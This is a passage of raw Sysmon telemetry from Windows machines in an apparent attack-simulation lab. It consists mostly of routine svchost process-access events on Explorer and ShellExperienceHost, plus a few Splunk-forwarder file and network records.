11:24:30.744{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298911Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:30.744{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298910Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:30.744{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298909Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:30.744{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298908Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:30.744{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298907Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:30.744{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298906Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:30.744{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298905Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:30.744{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298904Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:30.744{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298903Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:30.744{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298902Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:30.744{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298901Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:30.744{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298900Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:30.744{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298899Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:30.744{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298898Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:30.744{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298897Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:30.744{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298896Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:30.744{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298895Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:30.744{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298894Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:30.744{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298893Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:30.744{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298892Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:30.744{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298891Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:30.744{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298890Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:30.744{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298889Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:30.744{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298888Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:30.744{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298887Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:30.744{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298886Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:30.744{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298885Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:30.744{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298884Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:30.744{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298883Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:30.744{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000298882Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:30.660{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=684D186B87F90000391FACA00DED3140,SHA256=B38113B3220D7176B142D7DF0203A1943E940F09C337CB86CB8138DCB7C3200B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298881Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:28.639{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49569-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000222694Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:30.506{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=2C8387FA9FE1995FC6F2C7EE73A94219,SHA256=BB3EED52AF6972849E212CC49CEA52D5313CADB365AAD374F25023A543B3DFA6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222693Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:30.334{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program 